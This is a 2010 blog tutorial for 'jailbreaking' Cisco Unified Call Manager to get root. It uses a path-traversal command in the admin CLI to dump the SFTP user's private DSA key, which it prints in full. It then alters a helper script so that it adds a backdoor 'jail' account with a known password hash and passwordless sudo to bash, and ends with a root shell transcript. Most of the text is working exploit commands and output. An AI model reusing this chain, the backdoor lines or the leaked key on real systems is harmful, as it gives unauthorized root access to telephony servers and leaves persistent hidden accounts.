Jailbreak Cisco Unified Call Manager

by WK Wallace | Jul 15, 2010 | Appliances, Cisco, Hardware

1. Connect to the administrator CLI using SSH
2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:

   admin:file dump sftpdetails ../.ssh/id_dsa
   -----BEGIN DSA PRIVATE KEY-----
   MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
   6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
   +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
   saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
   a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
   bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
   JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
   5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
   fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
   PSfhcQWR3rOKaYUD85henvE=
   -----END DSA PRIVATE KEY-----
   

3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.

   C:\>copy con c:\temp\id.ots
   -----BEGIN DSA PRIVATE KEY-----
   MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
   6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
   +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
   saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
   a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
   bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
   JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
   5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
   fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
   PSfhcQWR3rOKaYUD85henvE=
   -----END DSA PRIVATE KEY-----
   ^Z
           1 file(s) copied.
   

4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:

   C:\> puttygen c:\TEMP\id.ots
   

   Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:

   C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
   Using username "sftpuser".
   Remote working directory is /home/sftpuser
   psftp>
   

6. Get the file sftp_connect.sh:

   psftp> get sftp_connect.sh
   remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
   psftp>exit
   

7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.

   chattr -i /etc/passwd
   chattr -i /etc/shadow
   echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
   echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
   echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
   chattr +i /etc/passwd
   chattr +i /etc/shadow
   

8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:

   C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
   Using username "sftpuser".
   Remote working directory is /home/sftpuser
   psftp> del sftp_connect.sh
   rm /home/sftpuser/sftp_connect.sh: OK
   psftp> put sftp_connect.sh
   local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
   psftp> chmod 555 sftp_connect.sh
   /home/sftpuser/sftp_connect.sh: 0644 -> 0555
   psftp>exit
   

9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.

   admin:file get tftp os7920.txt
   Please wait while the system is gathering files info ...done.
   Sub-directories were not traversed.
   Number of files affected: 1
   Total size in Bytes: 22
   Total size in Kbytes: 0.021484375
   Would you like to proceed [y/n]? y
   SFTP server IP: doesNotMatter
   SFTP server port [22]:
   User ID: SoonToBeRoot
   Password: ***
   
   Download directory: InYourFace
   
   Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
   admin:
   

10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:

    login as: jail
    [email protected]'s password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#